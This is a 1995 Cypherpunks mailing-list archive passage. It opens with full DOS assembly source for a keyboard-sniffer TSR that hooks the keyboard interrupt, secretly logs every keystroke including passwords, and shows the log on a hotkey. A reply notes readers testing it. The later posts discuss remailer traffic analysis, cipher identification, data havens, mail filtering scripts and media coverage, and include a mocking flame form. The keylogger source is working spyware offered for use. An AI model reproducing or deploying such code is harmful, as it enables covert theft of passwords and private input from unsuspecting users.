interrupt. ; It is also not a stretch of the imagination to say that it is ; possible that a program that monitors the keyboard buffer and ; display area for things that look like passwords (e.g., look ; for certain prompts, store next 500 characters) to either an ; unused area of the disk, or a hidden file, already exists. ; That is to say, the FBI, for example, could have already ; hired some programmers to come up with a .gif viewer that ; also attaches a keyboard sniffer to your system snooping ; for passwords, in the hopes that if and when the find a ; suspected (fill-in-the-blank) "crimminal", all they have ; to do is find the secret file created with their trojan TSR. ; ; ; ; KB_INT_NUM EQU 9 ;keyboard interrupt BUFFER_SIZE EQU 0b94H ;our buffer size, 19 lines 2 buffers TLC EQU 0C9H ;top left corner HL EQU 0CDH ;horizontal line TRC EQU 0BBH ;top right corner VL EQU 0BAH ;vertical line BLC EQU 0C8H ;bottom left corner BRC EQU 0BCH ;bottom right corner LCT EQU 0CCH ;left center tap RCT EQU 0B9H ;right center tap ALTPGUP EQU 9900H ALTPGDN EQU 0A100H ROM_BIOS_DATA SEGMENT AT 40H ;bios statuses and kb buffer ORG 1AH ;absolute KB_HEAD DW ? ;head of kb buffer KB_TAIL DW ? ;tail of kb buffer KB_BUFFER DW 16 DUP (?) ;The keyboard buffer KB_BUFFER_END LABEL WORD ROM_BIOS_DATA ENDS CODE_SEG SEGMENT ASSUME CS:CODE_SEG ORG 100H ; .com file FIRST: JMP INSTALL_INTERRUPTS_MAIN ; data area... buffer db BUFFER_SIZE dup ('*') head dw 5 tail dw 5 cnt dw ? ind dw ? show_buff dw 0 lkb_tail dw 0 ;last key board til ;this is for programs that leave ;the character in bios buffer ;past one interrupt, e.g., pgp OLD_KB_INTERRUPT LABEL WORD OLD_KB_INTERRUPT_ADDR DD ? row db ? idstring db "0x5fcf9eb78a01ef28" ;18 long KBINTERRUPT PROC NEAR ASSUME CS:CODE_SEG PUSH AX PUSH BX PUSH CX PUSH DX PUSH DI PUSH SI PUSH DS PUSH ES PUSHF CALL OLD_KB_INTERRUPT_ADDR CLI ASSUME DS:ROM_BIOS_DATA MOV BX,ROM_BIOS_DATA MOV DS,BX ; point ds to ROM_BIOS_AREA... MOV BX,KB_TAIL CMP BX,KB_HEAD JE nogo1 ;origianal keyboard interrupt has deleted char jmp short go1 mov cx,bx nogo1: jmp kbexit2 ;too far for je... go1: ;check to see if we already processed this character mov cx,bx ASSUME DS:CODE_SEG mov bx,cs mov ds,bx cmp cx,lkb_tail ;is it the same as last time? jne go3 ;no ASSUME DS:ROM_BIOS_DATA MOV BX,ROM_BIOS_DATA mov ds,bx jmp kbexit2 go3: mov lkb_tail,cx ;save new tail ASSUME DS:ROM_BIOS_DATA MOV BX,ROM_BIOS_DATA mov ds,bx mov bx,cx SUB BX,2 CMP BX,OFFSET KB_BUFFER ;did we wrap around? JAE NO_WRAP ;no MOV BX,OFFSET KB_BUFFER_END ;yes SUB BX,2 NO_WRAP:MOV DX,[BX] ; char in DX now... CMP DX,ALTPGUP ;altpgup hit? jne checknext1 ;no jmp short go2 ;yes, display first half of buffer checknext1: CMP DX,ALTPGDN ;altpgdn hit? jne nogo2 ;no mov kb_tail,bx ;delete alt pgdn from kb_buffer assume ds:code_seg mov cx,bx mov bx,cs mov ds,bx xor bx,bx ;garbage last tail mov lkb_tail,bx mov bx,offset buffer;yes, display second half of buffer add bx,BUFFER_SIZE/2 mov show_buff,bx call dump_buffer ;dump second half jmp kbexit1 nogo2: jmp save_key ;too far for jne.. go2: assume ds:rom_bios_data mov cx,bx mov bx,rom_bios_data mov ds,bx mov bx,cx mov kb_tail,bx ;delete ' pgup' from kb_buffer assume ds:code_seg mov cx,bx mov bx,cs mov ds,bx xor bx,bx ;garbage last tail mov lkb_tail,bx mov bx,offset buffer ;first half buffer mov show_buff,bx call dump_buffer ;dump first half jmp kbexit1 save_key: ASSUME DS:CODE_SEG MOV BX,CS MOV DS,BX mov bx,offset buffer add bx,head mov [bx],dl ;dh? inc bx mov cx,offset buffer add cx,BUFFER_SIZE cmp bx,cx ; at end of buffer? jz wrap_it ; yes sub bx,offset buffer mov head,bx jmp kbexit1 wrap_it: xor bx,bx mov head,bx jmp kbexit1 kbexit1: ASSUME DS:ROM_BIOS_DATA MOV BX,ROM_BIOS_DATA MOV DS,BX kbexit2: POP ES POP DS POP SI POP DI POP DX POP CX POP BX POP AX STI IRET KBINTERRUPT ENDP dump_buffer PROC NEAR ASSUME DS:CODE_SEG MOV BX,CS MOV DS,BX STI jmp over_data sl1 db " Keyboard Sniffer Program ",0 sl2 db " Short Circuit, Inc. Version: 0.72 (Beta), (C)opyright 1995 ",0 over_data: mov dh,0 ;row mov dl,0 ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,1 ;count? mov al,TLC ;top left corner mov ah,0ah ;service int 10h mov dh,0 ;row mov dl,4fh ;column = 79 dec mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,1 ;count? mov al,TRC ;top right corner mov ah,0ah ;service int 10h mov dh,17h ;row mov dl,0 ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,1 ;count? mov al,BLC ;bottom left corner mov ah,0ah ;service int 10h mov dh,17h ;row mov dl,4fh ;column=79 dec mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,1 ;count? mov al,BRC ;bottom right corner mov ah,0ah ;service int 10h mov cx,4eh ;78 dec mov dh,0 ;row mov dl,1 ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,4eh ; 78 characters mov al,HL ;horizontal line mov ah,0ah ;service int 10h ;put char mov dh,3 ;row mov dl,1 ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,4eh ; 78 characters mov al,HL ;horizontal line mov ah,0ah ;service int 10h ;put char mov dh,17h ;row mov dl,1 mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,4eh ;count mov al,HL ;horizontal line mov ah,0ah ;service int 10h ;put char mov cx,16h ;22 lines dline: mov dh,cl ;row mov dl,0 ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov dx,cx ;save cx mov bh,0 ;page mov cx,1 ;count mov al,VL ;vertical line mov ah,0ah ;service int 10h mov cx,dx ;restore cx mov dh,cl ;row mov dl,4fh ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov dx,cx ;save cx mov bh,0 ;page mov cx,1 ;count mov al,VL ;vertical line mov ah,0ah ;service int 10h mov cx,dx ;restore cx loop dline mov dh, 3h ;row mov dl, 0 mov bh, 0 ;page mov ah, 2 ;service int 10h ;set cursor position mov bh, 0 ;page mov cx, 1 ;count mov al,LCT ;horizontal line mov ah,0ah ;service int 10h ;put char mov dh, 3h ;row mov dl, 4fh ;column mov bh, 0 ;page mov ah, 2 ;service int 10h ;set cursor position mov bh, 0 ;page mov cx, 1 ;count mov al,RCT ;horizontal line mov ah,0ah ;service int 10h ;put char mov cx, BUFFER_SIZE/2 -1 ;going backwards... mov ind, cx mov cl, 13h dorows: mov row, cl mov cx, 4eh ll0: mov cnt, cx mov dl, cl ;to end of line ;inc dl ;cnt was 1 too small mov dh,row inc dh inc dh inc dh mov ah,2 ;set cursor position mov bh,0 ;page 0 int 10h ;move to 0,0 mov bx,show_buff ;show_buff points to correct half... add bx,ind ;ind must have index, *(show_buff + ind) mov al,[bx] mov bh,0 mov cx,1 mov ah,0ah int 10h dec ind ;decrement index mov cx,cnt loop ll0 mov cl,row dec cl jnz dorows mov dh,1 mov dl,1 mov bx,offset sl1 call print_string mov dh,2 mov dl,1 mov bx,offset sl2 call print_string mov dh,18h mov dl,4 mov bh,0 mov ah,2 int 10h ;move back to correct position ret dump_buffer ENDP print_string PROC NEAR ;assumes ds==cs ;null terminated string, address in bx... ;row in dh ;col in dl ;uses bios int 10h, safe for tsr programs... jmp over_local_ps sadd dw ? over_local_ps: mov sadd,bx np: mov bh,0 mov ah,2 int 10h mov bx,sadd mov al,[bx] cmp al,0 ;is it 0? je pse ;yes, return inc bx mov sadd,bx inc dl mov bh,0 mov cx,1 mov ah,0ah int 10h jmp np ;next print (next character) pse: ret ;done, encountered 0 print_string ENDP ; Anything before this point stays in memory if it's okay to install... ; tests to see if kbs is already installed, returns ; zf=1 if it was already installed. ; zf=0 if it has not been previously installed. kbia PROC NEAR ;assumes ds points to code segment... MOV AH, 35H ;put old vector into es:bx MOV AL,KB_INT_NUM INT 21H mov si,offset idstring ;ds:si points to our string mov di,bx sub di, 12h ;es:di points to other string? mov cx,12h REPE cmpsb ret kbia endp INSTALL_INTERRUPTS_MAIN PROC NEAR ASSUME DS:CODE_SEG mov bx,cs mov ds,bx xor bx,bx mov head,bx mov tail,bx jmp over_temp_data instg db "Kbs installed.",0dh,0ah,"$" notinstg db "Kbs already installed.",0dh,0ah,"$" over_temp_data: call kbia je dont_install_it jmp install_it dont_install_it: mov dx,offset notinstg mov ah,09h int 21h mov bx,cs mov es,bx int 20h install_it: MOV AH, 35H ;put old vector into es:bx MOV AL,KB_INT_NUM INT 21H MOV OLD_KB_INTERRUPT,BX MOV OLD_KB_INTERRUPT[2],ES MOV AH,25H ;set new keyboard interrupt LEA DX,KBINTERRUPT INT 21H mov dx,offset instg mov ah,09h int 21h ASSUME DS:ROM_BIOS_DATA MOV BX,ROM_BIOS_DATA MOV DS,BX mov cx,KB_TAIL ASSUME DS:CODE_SEG MOV BX,CS MOV DS,BX mov lkb_tail,cx MOV DX, offset kbia ;ds:dx end of stay resident INT 27H ;allocate and stay resident INSTALL_INTERRUPTS_MAIN ENDP CODE_SEG ENDS END FIRST ; P.S. I haven't programmed in asm in a long time, no fair flaming ;me for poor programming style/ineffecient code. ; Use this code at your own rish. From m00012 at KANGA.STCLOUD.MSUS.EDU Wed Jan 11 23:05:03 1995 From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU) Date: Wed, 11 Jan 95 23:05:03 PST Subject: How do I know if its encrypted? Message-ID: <0098A541.0A71B0E0.1313@KANGA.STCLOUD.MSUS.EDU> Check the entropy? From carolb at barton.spring.com Wed Jan 11 23:53:00 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Wed, 11 Jan 95 23:53:00 PST Subject: How do I know if its encrypted? (fwd) Message-ID: T.C. May, so eloquently waxed: The squeals of the net.cops were impressive to behold! Demands to Netcom that I be expelled from the Net, that the "Child Welfare Agents" would soon be breaking down my doors, etc. Nobody spotted the message. After several days, I "let the truth be told," which of course enraged others. I thought this digression might be amusing to some. --Tim May Did they write the standard "ticket"? form319.2(1/95) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * * * * N O T I C E O F N E T I Q U E T T E B R E A C H * * * * * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NOTICE: IT HAS COME TO OUR ATTENTION THAT YOU HAVE POSTED SOMETHING THAT HAS BEEN CONSIDERED WORSE THAN: ___ a Rush Limbaugh quote. ___ a Newt Gingrich joke. ___ a reference to Beavis & Butthead. _X_ lame ASCII graphic(s) (Choose all that apply): ___ USS Enterprise _X_ Australia ___ The Amiga logo ___ Company logo (Mark only if above also) ___ and you stated that you don't speak for your employer. ___ Bicycle ___ Bart Simpson Furthermore: _x_ You have greatly misunderstood the purpose of ___the.news.group___ (newsgroup) _x_ You have greatly misunderstood the purpose of the net. _x_ You are a loser. ___ You must have spent your entire life in a skinner box to be this clueless. _x_ *plonk* _x_ This has been pointed out to you before. (see prior form) _x_ It is recommended that you: (Mark all that apply) _x_ stick to FidoNet and come back when you've grown up. _x_ find a volcano and throw yourself in. ___ get a gun and shoot yourself. _x_ stop reading Usenet news and get a life. ___ stop sending email and get a life. ___ consume excrement. ___ consume excrement and thus expire. Additional comments: My apologies to all responsible users who have had to view this horrible, lousy, lame, excuse for writing. I certainly hope this person gets their butt thrown in jail, but I'll settle for having their net access permanently revoked. ' . . . and thus ex RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO EVERY INTERNET NEWSGROUP NEAR YOU! . . . . . CENSORED.COM .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From carolb at barton.spring.com Thu Jan 12 00:32:22 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Thu, 12 Jan 95 00:32:22 PST Subject: Data Havens..A consumer perspective Message-ID: 1. You have what I want or need. 2. In order for me to let you store it, I will give it to you anyway you wish to get it. 3. I will let you do anything to the data you wish, so long as I get it back intact. 4. It is no concern (only idle curiosity maybe) where the data is parked. 5. I would expect to pay money for the safekeeping of my data. 6. I would expect the longer you hold the data, the more it will cost. 7. The only thing I am counting on is the data's timely retrieval. 8. Welcome to the world of data "coatchecking". Why make it more complex than this? >From the moment the data leaves their hands, until I return it, they have no right, nor I no obligation, to divulge anything about it. For they already would know, it would take a few minutes to retrieve it. For whether it's encrypted to the nth degree, or parked in a plain brown wrapper in a massive unix box somewhere, as long as I the haven manager, return the data in a safe, timely, uncorrupted manner, I've done my duty. Love Always, Carol Anne RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From carolb at barton.spring.com Thu Jan 12 01:23:31 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Thu, 12 Jan 95 01:23:31 PST Subject: keyboard sniffer TSR source code... In-Reply-To: <0098A540.BC444360.1303@KANGA.STCLOUD.MSUS.EDU> Message-ID: I'm sure that as many people are now silently testing it, and that they are a bit busy at the moment, I think they'd register their thanks if they could. Love Always, Carol Anne RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From rparratt at london.micrognosis.com Thu Jan 12 01:43:37 1995 From: rparratt at london.micrognosis.com (Richard Parratt) Date: Thu, 12 Jan 95 01:43:37 PST Subject: Storm Signals Message-ID: <9501120943.AA03267@pero> > > If I were the DOD, I would set the standard GPS default to selective > availability. After all, with SA on military receivers can still get > fine positioning data. If someone could come up with a good reason to > turn SA off, great, but I wouldn't leave it on otherwise. > > The scenarios concerning GPS-piloted Cessnas full of nasty stuff come > to mind, especially vis-a-vis the North Koreans. They probably don't > have accurate IRBMs but they certainly could cobble together a > Learjet-based delivery system. SA is effectively cancelled out by using differential GPS (Using a correction transmitter to send out differences between GPS as-reported position and actual position). However, any 'home made cruise missile' would need to be fairly slow moving and manoevring. One of the features of p-Code is support for 'high-dynamic' vehicles. I've been away from the navigation field for some years, so others may know more. Does the Russian Glonass system have SA? -- Richard Parratt From parsons at bga.com Thu Jan 12 03:52:29 1995 From: parsons at bga.com (Brad Parsons) Date: Thu, 12 Jan 95 03:52:29 PST Subject: CBS/C.Chung Plan Hit Job on Internet? (fwd) Message-ID: ---------- Forwarded message ---------- Date: Wed, 11 Jan 1995 07:32:03 -0800 (PST) From: Skip Leuschner Subject: Re: CBS/C.Chung Plan Hit Job on Internet? I see C.Chung's program as one of the first vollies in a new phase of a TV/print media project. Internet and talk radio emerged as political forces in the '94 election. If political influence by the media is a zero-sum game, as I believe it is, then the TV and print media must look to their own survival by trying to discredit or regulate their talk radio/internet competition. Regards, Skip. From caj at tower.stc.housing.washington.edu Thu Jan 12 04:02:58 1995 From: caj at tower.stc.housing.washington.edu (Craig A. Johnston) Date: Thu, 12 Jan 95 04:02:58 PST Subject: mail killfiling Message-ID: <199501121202.EAA03835@tower.stc.housing.washington.edu> There was some talk on the list earlier about reading the list through news so as to be able to use kill files. Here is an alternate way for folks that have 'deliver' installed on their system as the local mail agent. (do a "grep Mlocal /etc/sendmail.cf" to see...if you don't see 'deliver' in there somewhere, you don't. This is provided you are using sendmail, of course.) First, install the following as ".deliver" in your home dir: --- cut here --- #!/bin/sh # delivers all mail except that from folks in $NOMAIL NOMAIL=.nomail FROM=`header -f From $HEADER` if grep "$FROM" $NOMAIL >/dev/null 2>/dev/null then # we don't want any mail from this person! exit fi echo "$1" # otherwise, deliver as usual --- cut here --- Now, you also need this little script that I call "killem" installed in your home dir. --- cut here --- #!/bin/sh NOMAIL=.nomail header -f From >> $NOMAIL --- cut here --- Now, let's say you are in your mailbox and you see such a horrible piece of mail from someone that you never want to see any mail from them again. ;) Provided you are using 'elm', (probably is a mechanism for this on other readers.) just pipe the message through 'killem' with a "|" from elm and answer "killem" when asked what you want to pipe the message through. The From: line will be stripped and stuck in .nomail (or whatever you change it to) and you won't see any more mail from this person. Of course, this is not entirely true: mail that does not get delivered will go to a file called Undel.mail in your home dir, which you can keep, or have a cron job deal with, or whatever you like. Also, if they change their 'real name' on their system, you'll start to get mail from them again. (i.e. w/'chfn' or the like.) This is just a quick hack I whipped up a moment ago, and could of course be improved/changed. 'deliver' will also run perl scripts, and it should be relatively easy to write something that way that will handle wildcarding and field selection. An automated mailing to folks upon their 'termination' could be added for those that want to rub it in, or an automated bounce that sends mail right back with a note that their mail is not being received. If you want to block mail based just upon the account name and not have to worry about them changing their "real" name, you can just add the account name to .nomail manually. Judicious use of the unix 'cut' command could have 'killem' just toss the account name into .nomail for mail coming from unixy systems, but would fail for others, so I decided to not assume anything about the From: line. Ought to work fine and transparently for most folks as-is. Ingenious folks can build on it. I dunno how many systems use 'deliver', but it's sort of a Linux (slackware) default, and those using it can avoid learning procmail with this script. Enjoy, Craig. From root at einstein.ssz.com Thu Jan 12 04:44:27 1995 From: root at einstein.ssz.com (root) Date: Thu, 12 Jan 95 04:44:27 PST Subject: Data Havens..A consumer perspective In-Reply-To: Message-ID: <199501121232.GAA01351@einstein.ssz.com> > 2. In order for me to let you store it, I will give it to you > anyway you wish to get it.a I will let you store it but in order to access it I get access to your stores of data. > 3. I will let you do anything to the data you wish, so long as I > get it back intact. Actually for a real data haven to work it should not only keep the original data but any inferences you make with the old data or any new data you use in the analysis of the old data. > 5. I would expect to pay money for the safekeeping of my data. Or provide some service in kind. > 6. I would expect the longer you hold the data, the more it will cost. The longer you hold the data the less it is worth. From brendan at moe.oc3s-emh1.army.mil Thu Jan 12 05:22:32 1995 From: brendan at moe.oc3s-emh1.army.mil (Brendan McKenna) Date: Thu, 12 Jan 95 05:22:32 PST Subject: Cryptanalysis Message-ID: <9501121322.AA22913@toad.com> Hi, I light of recent threads about recognising whether or not a given message/file is encrypted, and using CBW and things along those lines, is there any way to determine how something was encrypted? For example, I know that a statistical analysis of the cyphertext will uncover simple substitution cyphers fairly quickly. Does the same sort of analysis apply to determining whether something was encrypted using IDEA or DES or RSA? I realize that they attempt to maximize the entropy of the cyphertext -- perhaps there is some characteristic amount or range of amounts of entropy associated with these cyphers? Not every package is as nice as PGP in labeling everything it encrypts with headers... Any pointers would be greatly appreciated.... Brendan PS. What I'd like to be able to do is take a given chunk of cyphertext and analyze it and say: "There is an x% probability that this was encrypted using method y...." Hopefully I'd have a reasonable chance of recognizing how it was encrypted, and not all of the percentages would be so low as to make the exercise meaningless. From roy at cybrspc.mn.org Thu Jan 12 05:57:08 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Thu, 12 Jan 95 05:57:08 PST Subject: Cybersmut In-Reply-To: <199501112303.SAA14349@pipe1.pipeline.com> Message-ID: <950112.065951.0M1.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, jya at pipeline.com writes: [ two horsemen deletia ] > Brick said telltale signs of porn being downloaded include: > > "If you have a 100-megabyte drive and it's always full and > the kids are demanding more memory. Photos can take a lot > of memory. " [ giggle, snort ] A full 100 meg drive is a telltale sign of a typical Windoze installation. Sheesh! These 'reporters' need a hobby... - -- Roy M. Silvernail -- roy at cybrspc.mn.org "I'm a family man, model citizen." -- Warren Zevon -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLxUoORvikii9febJAQHQOQQAlG3rOFcDP54Wi6IAjBpfu+y3Bq7paB9V gaTJ5wYG6EkvpkUIoHyimF2NXXpRVRcRJbtsE/bDNRfKV/csifTHlXILNl/IOE6r RUPxTrHY7r0ubWouy4qdi5i4q4tQ88jOFYQUPu7jPJPfqzC7XX84l5vHMakytx0D pI9CegILWtY= =3NRh -----END PGP SIGNATURE----- From weidai at eskimo.com Thu Jan 12 06:02:40 1995 From: weidai at eskimo.com (Wei Dai) Date: Thu, 12 Jan 95 06:02:40 PST Subject: analysis of RemailerNet Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I've been reading through T.C. May's FAQ, and came upon this section about analyzing the RemailerNet. > + What's needed: > - aggreement on some terminology (this doesn't require > consensus, just a clearly written paper to de facto > establish the terminology) > - a formula relating degree of untraceability to the major > factors that go into remailers: packet size and > quantization, latency (# of messages), remailer policies, > timing, etc. > - Also, analysis of how deliberate probes or attacks might > be mounted to deduce remailer patterns (e.g., Fred always > remails to Josh and Suzy and rarely to Zeke). > - I think this combinatorial analysis would be a nice little > monograph for someone to write. > 8.10.2. A much-needed thing. Hal Finney has posted some calculations > (circa 1994-08-08), but more work is sorely needed. I think one of the most difficult aspects of analyzing remailers is the large number of variables you have to deal with. In contrast, when analyzing ciphers things are pretty much static. The only thing variable you have to worry about is key length. But think of the factors you have to include in a complete analysis of the RemailerNet: 1. different methods of attack - passive traffic analysis (i.e., packet sniffing) - active attacks: including physical attacks, subverting remailer security, flooding, denial-of-service, starting "trap" remailers, etc. 2. differences at the user level - fixed vs random chains vs something in between - length of chains - numbers of real messages sent - numbers of fake (cover) messages sent - concerns about latency, bandwidth, and monetary costs - acceptibility of risk, and benifits of anonymity 3. differences at the individual remailer level - the mixing mechanism: does batched mailing occur by time or by the number of messages in the queue, and is there a rollover pool? - security: including vulnerabilities to political, physical, and electronic attacks - usage level - price 4. differences at the RemailerNet level - total numbers of remailers - average security (or the number of compromised remailers) - total number of users ... and I'm sure there are more. The number of variables and the complex way they're all interrelated make the analysis difficult. Perhaps a good way to go about this is to construct simplified models which focus on different aspects. For example, someone pointed out that if you didn't have to worry about active attacks, and the attacker can monitor all the remailers, then you can treat the entire RemailerNet as a single large remailer. I'm not sure how well this approach would work, since I don't know how easy it would be to integrate the different simplified models into a realistic one. Anyhow, this might at least give us some insights, so I'll make some attempts in this direction, and post my results. Just to start things off though, let me try an *extremely* simple model. Assume there is just one remailer, it's perfectly secure, and it does 4 batches of remailing at equal intervals each day. There are one million users, each of whom receives a mail from the remailer once per day. Alice is sending anonymous mail to Bob through this system, also once per day. But just to be extra careful, she also sends a cover mail to the remailer at some other time each day, which gets redirected to its /dev/null. So the situation looks like this on day 1: Alice sends Bob receives some random user receives Batch #1: 0 0 0 Batch #2: 1 1 0 Batch #3: 0 0 1 Batch #4: 1 0 0 Suppose Eve, the traffic analyst, is trying to figure out who Alice is sending mail to. After the first day, she can eliminate about half of the remailer users from the list of possible targets, because they, like the the random user above, received a mail even though Alice didn't send one out during the collection period of that batch. Now, since Eve can eliminate on average half of the list every day, Bob will be the only person left on that list after about (log base 2 of one million) = 20 days. Suppose Alice sent out some different numbers of cover e-mail: # of cover mail # of days to discover Bob 0 log base 4 of 1,000,000 = 10 1 log base 2 of 1,000,000 = 20 2 log base 4/3 of 1,000,000 = 48 3 log base 1 of 1,000,000 = infinity! Hopefully that makes sense... Comments? Wei Dai -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxU0QTl0sXKgdnV5AQFkoAP/SSyqbbDw+zoh+q5aL0+xr5BcLzaEoS4h NASocZvKHGLe8/sfefDj4J2zPINKhmQzbKdD4oHirPEVbnWZC+7Us3giCKl80t2V bKx6QPB1hJWi6n3cFme6NCuTjmHCsgrQ/bI2j524O43FhW6BIQAAxQ6GGN10t1V8 3nv3SzUC6jE= =Y2qv -----END PGP SIGNATURE----- From tedwards at src.umd.edu Thu Jan 12 06:20:29 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Thu, 12 Jan 95 06:20:29 PST Subject: CBS/C.Chung Plan Hit Job on Internet? (fwd) In-Reply-To: Message-ID: On Thu, 12 Jan 1995, Brad Parsons wrote: > From: Skip Leuschner > I see C.Chung's program as one of the first vollies in a new phase of a > TV/print media project. > Internet and talk radio emerged as political forces in the '94 > election. If political influence by the media is a zero-sum game, as I > believe it is, then the TV and print media must look to their own > survival by trying to discredit or regulate their talk radio/internet > competition. Clearly. I think Time magazine, as they come onto the Internet, is realizing that the culture here does not take well to bogus and misleading journalism. The Time reporter who wrote the article on the modern militia movement in the US asked on talk.politics.guns what people thought about his article - oh my, you've never seen such a flamefest! Not to mention the immense amount of pro-firearm opinions on the Time WWW talkback area. For a magazine which has publically announced that they are anti-RKBA, I think they are viewing all of this with some dismay. That is only a single issue - I think as more standard media groups come on-line, they will have to choose either to try to destroy the net through demonizing it, or change with it into an adaptive reporting system with traditional journalistic ethics. -Thomas From weidai at eskimo.com Thu Jan 12 06:26:07 1995 From: weidai at eskimo.com (Wei Dai) Date: Thu, 12 Jan 95 06:26:07 PST Subject: time stamping service (again) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- My PGP based time stamping service is back online. I took it down a while ago thinking the folks at notary.com (Digital Time-Stamp, Inc.) were going to release their commercial time stamping product soon (it uses a more elegant protocol that doesn't require trust in the time stamper, but the algorithm is patented). But I haven't heard anything from them in a while. Anyway, it is now running as the following procmail recipe: :0 w * ^Subject: Time Stamp This Mail { PGPPASS=whateveryourpassphraseis :0 c w | (lockfile timestamp.lock ; pgp -fast +batchmode +force +verbose=0 \ +clearsig=off) > timestamp.out :0 a h | (formail -r -i 'Subject: Time Stamp Output';cat timestamp.out) | \ ($SENDMAIL -t ;rm -f timestamp.lock) } To use it, just send whatever you need time stamped to me with the subject "time stamp this mail". BTW, can a procmail expert explain to me why the locallockfile mechanism doesn't work with this recipe? If I use :0 w : as the first line, procmail will happily ignore the locallockfile flag and proceed to munge up timestamp.out, so I have to do the filelocking manually. Wei Dai -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxU7Zjl0sXKgdnV5AQE1agP/TFGtHEUj6GUwEF1ISGLcUZ/T64Vs7BUJ PIcydYUDk/5AVPLS2F8r81oLLxDUzYFkVy/6uvhnj6Pvo17ZIx6ELhKNPLPVoLPL iklR9E7rmY2cRMQfuCPRYi10x4mD9yJcw0GmlQmgOqZS/HfQ30njrsAeDXBUNvA5 SvFBaPKuOro= =NNoJ -----END PGP SIGNATURE----- From rparratt at london.micrognosis.com Thu Jan 12 06:26:18 1995 From: rparratt at london.micrognosis.com (Richard Parratt) Date: Thu, 12 Jan 95 06:26:18 PST Subject: Cryptanalysis Message-ID: <9501121425.AA03332@pero> > I light of recent threads about recognising whether or not a given > message/file is encrypted, and using CBW and things along those lines, is there > any way to determine how something was encrypted? For example, I know that > a statistical analysis of the cyphertext will uncover simple substitution > cyphers fairly quickly. Does the same sort of analysis apply to determining > whether something was encrypted using IDEA or DES or RSA? I realize that they > attempt to maximize the entropy of the cyphertext -- perhaps there is some > characteristic amount or range of amounts of entropy associated with these > cyphers? Not every package is as nice as PGP in labeling everything it > encrypts with headers... Any pointers would be greatly appreciated.... If the encryption method is any good, the output will be pseudo-random with no digit being more frequent than any other. This certainly applies to IDEA and DES. With RSA, you usually have a random (IDEA) session key encrypted using the senders private key. This will also be an effectively 'random' number. > PS. What I'd like to be able to do is take a given chunk of cyphertext and > analyze it and say: "There is an x% probability that this was encrypted > using method y...." Hopefully I'd have a reasonable chance of recognizing > how it was encrypted, and not all of the percentages would be so low as > to make the exercise meaningless. This would only work for ciphers that are effectively 'broken'. Also, many packages and users compress data before encryption. Compression algorithms work by removing patterns from data, so the resultant compressed plaintext becomes fairly random anyway, removing the utility of frequency analysis. -- Richard Parratt From nelson at crynwr.com Thu Jan 12 06:26:46 1995 From: nelson at crynwr.com (Russell Nelson) Date: Thu, 12 Jan 95 06:26:46 PST Subject: Reefer madness In-Reply-To: Message-ID: From: craig at passport.ca (Craig Hubley) Date: Thu, 12 Jan 1995 01:20:00 -0500 (EST) Cc: efc-talk at insight.dcss.mcmaster.ca Seems to me I have seen something like this cybersmut hype before... wasn't it called 'Reefer Madness'? The threat is no doubt overblown, but it's not all foolishness. My NY State Senator is proposing to make a felony out of initiating contact with a minor for sexual purposes. It's illegal now, but it's only a misdemeanor. I spoke to Bob Penna, the legislative aide who researched and wrote up the bill for Bill Sears. He realizes that the Internet cannot reasonably be censored, and that the solution is to be able to punish people who do it (hence the felony) and to educate parents and teachers to supervise children's online dealings (hence the travelling road show to do just that). No mention of "watch out if your child starts using encryption programs" as a sign of online abuse. Bob Penna admitted to having no online access, so I'm sure he knows nothing about encryption. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 